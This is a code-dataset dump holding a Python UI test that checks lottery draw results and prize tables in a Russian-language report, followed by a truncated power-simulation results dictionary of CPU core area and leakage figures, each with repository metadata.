0
| 7
|
44d366dffa7eb0e0249af0f789b8d155cc9fe83e
| 4,083
|
py
|
Python
|
test/ResultsAndPrizes/5x36(old)/test_5x36_results_for_several_draws.py
|
FearFactor1/SPA
|
a05aaa924c5bebb52cd508ebdf7fd3b81c49fac7
|
[
"Apache-2.0"
] | 1
|
2019-12-05T06:50:54.000Z
|
2019-12-05T06:50:54.000Z
|
test/ResultsAndPrizes/5x36(old)/test_5x36_results_for_several_draws.py
|
FearFactor1/SPA
|
a05aaa924c5bebb52cd508ebdf7fd3b81c49fac7
|
[
"Apache-2.0"
] | null | null | null |
test/ResultsAndPrizes/5x36(old)/test_5x36_results_for_several_draws.py
|
FearFactor1/SPA
|
a05aaa924c5bebb52cd508ebdf7fd3b81c49fac7
|
[
"Apache-2.0"
] | null | null | null |
# 5 out of 36 (Old) + Results of several draws
def test_5x36_results_for_several_draws(app):
    app.ResultAndPrizes.open_page_results_and_prizes()
    app.ResultAndPrizes.click_results_for_several_draws()
    app.ResultAndPrizes.click_ok_for_several_draws_modal_window()
    app.ResultAndPrizes.button_get_report_winners()
    # Parse the winners report once and reuse it for all checks.
    report = app.ResultAndPrizes.parser_report_text_winners()
    assert "РЕЗУЛЬТАТЫ ТИРАЖА" in report
    assert "ЛОТО 5/36 (Старая) - Тираж 10573 :" in report
    assert "07/09/2017, 19:00:00 ЛОК" in report
    # Every expected table fragment must appear in the report.
    assert all(s in report for s in ("Кат.", "Выигрыш руб.", "Кол-во", "Всего"))
    assert all(s in report for s in ("5/5+1", "0", "0", "0"))
    assert all(s in report for s in ("5/5", "30676", "25", "766900"))
    assert all(s in report for s in ("4/5", "2793", "874", "2441082"))
    assert all(s in report for s in ("3/5", "292", "8232", "2403744"))
    assert "ЛОТО 5/36 (Старая) - Тираж 10572 :" in report
    assert "07/09/2017, 18:16:00 ЛОК" in report
    assert all(s in report for s in ("Кат.", "Выигрыш руб.", "Кол-во", "Всего"))
    assert all(s in report for s in ("5/5+1", "0", "0", "0"))
    assert all(s in report for s in ("5/5", "8000", "67", "536000"))
    assert all(s in report for s in ("4/5", "800", "2096", "1676800"))
    assert all(s in report for s in ("3/5", "80", "19737", "1578960"))
    assert "ЛОТО 5/36 (Старая) - Тираж 10571 :" in report
    assert "07/09/2017, 18:01:00 ЛОК" in report
    assert all(s in report for s in ("Кат.", "Выигрыш руб.", "Кол-во", "Всего"))
    assert all(s in report for s in ("5/5+1", "4815260", "2", "9630520"))
    assert all(s in report for s in ("5/5", "8000", "129", "1032000"))
    assert all(s in report for s in ("4/5", "800", "3065", "2452000"))
    assert all(s in report for s in ("3/5", "80", "29048", "2323840"))
    assert "ЛОТО 5/36 (Старая) - Тираж 10570 :" in report
    assert "07/09/2017, 17:46:00 ЛОК" in report
    assert all(s in report for s in ("Кат.", "Выигрыш руб.", "Кол-во", "Всего"))
    assert all(s in report for s in ("5/5+1", "0", "0", "0"))
    assert all(s in report for s in ("5/5", "8000", "139", "1112000"))
    assert all(s in report for s in ("4/5", "800", "4298", "3438400"))
    assert all(s in report for s in ("3/5", "80", "40331", "3226480"))
    assert "ЛОТО 5/36 (Старая) - Тираж 10569 :" in report
    assert "07/09/2017, 17:31:00 ЛОК" in report
    assert all(s in report for s in ("Кат.", "Выигрыш руб.", "Кол-во", "Всего"))
    assert all(s in report for s in ("5/5+1", "3034294", "3", "9102882"))
    assert all(s in report for s in ("5/5", "8000", "269", "2152000"))
    assert all(s in report for s in ("4/5", "800", "7449", "5959200"))
    assert all(s in report for s in ("3/5", "80", "69742", "5579360"))
    app.ResultAndPrizes.comeback_main_page()
| 88.76087
| 113
| 0.752633
| 618
| 4,083
| 4.754045
| 0.169903
| 0.257318
| 0.302246
| 0.377808
| 0.810756
| 0.793737
| 0.793737
| 0.763104
| 0.763104
| 0.763104
| 0
| 0.114326
| 0.128092
| 4,083
| 46
| 114
| 88.76087
| 0.710955
| 0.011021
| 0
| 0.186047
| 0
| 0
| 0.187763
| 0
| 0
| 0
| 0
| 0
| 0.837209
| 1
| 0.023256
| false
| 0
| 0
| 0
| 0.023256
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
44f2358bc38099a093b667b1a917e20d40b93796
| 68,546
|
py
|
Python
|
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_heteroFair/cmp_sjeng/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_heteroFair/cmp_sjeng/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_heteroFair/cmp_sjeng/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.398842,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.690649,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.396107,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.4856,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.394239,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.65294,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0144583,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.104552,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.106928,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.104552,
'Execution Unit/Register Files/Runtime Dynamic': 0.121386,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.252641,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.661894,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.87694,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00420062,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00420062,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00371035,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00146457,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00153603,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0136476,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0384308,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.102793,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.348134,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.34913,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 0.852135,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0110794,
'L2/Runtime Dynamic': 0.00353944,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.72764,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.2019,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0805741,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0805741,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.10967,
'Load Store Unit/Runtime Dynamic': 1.67983,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.198682,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.397364,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0705129,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0706297,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0572173,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.680396,
'Memory Management Unit/Runtime Dynamic': 0.127847,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 23.9845,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0203946,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.207867,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.228261,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 5.76856,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.174315,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.281163,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.141922,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.597399,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.199365,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.21299,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00731154,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0528716,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0540733,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0528716,
'Execution Unit/Register Files/Runtime Dynamic': 0.0613848,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.111386,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.291762,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.55861,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00233622,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00233622,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.0021177,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000865114,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000776767,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00756691,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0194391,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.051982,
